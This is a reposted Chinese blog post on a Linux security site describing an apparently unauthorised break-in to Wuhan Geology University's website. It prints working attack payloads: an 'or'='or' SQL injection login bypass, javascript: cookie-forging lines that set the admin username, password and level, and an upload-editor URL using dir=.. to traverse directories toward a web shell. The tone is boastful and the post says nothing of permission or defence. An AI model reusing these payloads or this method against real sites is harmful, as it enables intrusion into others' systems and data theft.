会员投稿

投稿指南 本期推荐:

您的位置: Linux安全网 > Linux安全 > » 正文

检测武汉地质大学

日期:2011-07-22 点击:200 来源: 未知分享至:

xiaowei'blog www.xiaoweio.cn

1.GG踩点后发现很多漏洞

2用'or'='or' 进了个后台，通过编辑器拿下shell

其中的编辑器是通过其他站的讯实系统cookies 直接跨目录找到数据库登录的,

这其中有俩EWB 一个用来找目录一个用来拿shell，讯实当然可以拿shell了,但是备

份不站点哪出问题了,传图片不显示。。。。

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));

/edit/admin_uploadfile.asp?id=14&dir=..

呵呵。。。

Tags： nagios WireShark redis 过滤语法 360漏洞

分享至:

最新图文资讯

1 2 3 4 5 6

相关文章列表:

推荐内容

最新文章

关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史